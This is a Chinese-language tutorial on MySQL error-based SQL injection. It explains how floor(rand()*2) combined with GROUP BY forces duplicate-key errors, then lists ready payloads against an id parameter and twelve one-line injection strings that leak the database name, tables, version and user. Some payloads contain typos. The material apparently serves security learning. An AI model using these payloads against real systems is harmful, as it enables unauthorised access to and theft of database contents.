关于SQL注入中的报错注入

小知识:

以下都可以在phpstudy中进行mysql命令行尝试

select count(*) from table1;

计算一下你选取的有多少结果

select rand();

生成一个随机数0-1

select rand()*2;

生成一个随机数0-2

select floor(1.56);

向下取整

select floor(rand()*2);

取一个随机0-1的整数(0或者1)

select floor(rand()*2)a;

取一个别名(区别可以根据上面没加a的区分)

select * from table1 group by id;

以id分组

select concat(1,2,3);

把字符拼接起来

0x3a	:
0x7e	~

select concat(0x3a,0x3a,’haha’);

select concat(0x3a,0x3a,(select database()),0x3a,0x3a)a;

::库名::

select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a;

::库名::[随机0或1]

select ‘haha’ from table1; #注意观察结果，对比select * from table1;

select floor(rand()*2)a from table1;

select floor(rand()*2) from information_schema.columns;

select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns;

select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a; 多执行几次，这个语句可能报错，可能执行成功

select count(*)，concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from table1;

select count(*)，concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from table1 group by a;
报错Duplicate(重复)，注意报错内容，也可能不报错

count(*)计数的其实是后面floor()语句

上述语句等效于:

select count(*)，concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2)) from table1 group by concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2)); =⇒group by 按照后面concat执行结果排序(0或者1)

在mysql官方解释里面，rand()函数，每次出现都会重新计算一次

select rand(0);

执行后，我们发现它不随机了

---

---

报错注入

如果输入错误就会报错，如果输入正确，会查数据库，但是不显示东西

爆库名(这个拼运气，有时候会爆不出来，多试几次)

*index.php?id=2’ AND (select 1 from (select count(),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.tables group by a)b) —+*

爆表名(修改的部分就是(select ....) 部分)

index.php?id=2’ AND (select 1 from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=’security’ limit 0,1),0x3a,0x3a,floor(rand()*2))a from information_schema.tables group by a)b) —+

爆其他数据同理，修改(select ...)部分就行

---

一些其他简单的构造语句

简单高效:

*‘ and extractvalue(1,concat(0x7e,(select database()),0x7e)) —+*

*‘ and updatexml(1,concat(0x7e,(select database()),0x7e),1) —+*

十二种报错注入

1、通过floor报错,注入语句如下:
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

2、通过ExtractValue报错,注入语句如下:
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

3、通过UpdateXml报错,注入语句如下:
and 1=(updatexml(1,concat(0x3a,(select user())),1))

4、通过NAME_CONST报错,注入语句如下:
and exists(select*from (select*from(selectname_const(@@version,0))a join (select name_const(@@version,0))b)c)

5、通过join报错,注入语句如下:
select * from(select * from mysql.user ajoin mysql.user b)c;

6、通过exp报错,注入语句如下:
and exp(~(select * from (select user()) a) );

7、通过GeometryCollection()报错,注入语句如下:
and GeometryCollection((select *from(select user())a)b);

8、通过polygon ()报错,注入语句如下:
and polygon ((select * from(select user())a)b );

9、通过multipoint ()报错,注入语句如下:
and multipoint ((select * from(select user())a)b );

10、通过multlinestring ()报错,注入语句如下:
and multlinestring ((select * from(select user())a)b );

11、通过multpolygon ()报错,注入语句如下:
and multpolygon ((select * from(select user())a)b );

12、通过linestring ()报错,注入语句如下:
and linestring ((select * from(select user())a)b );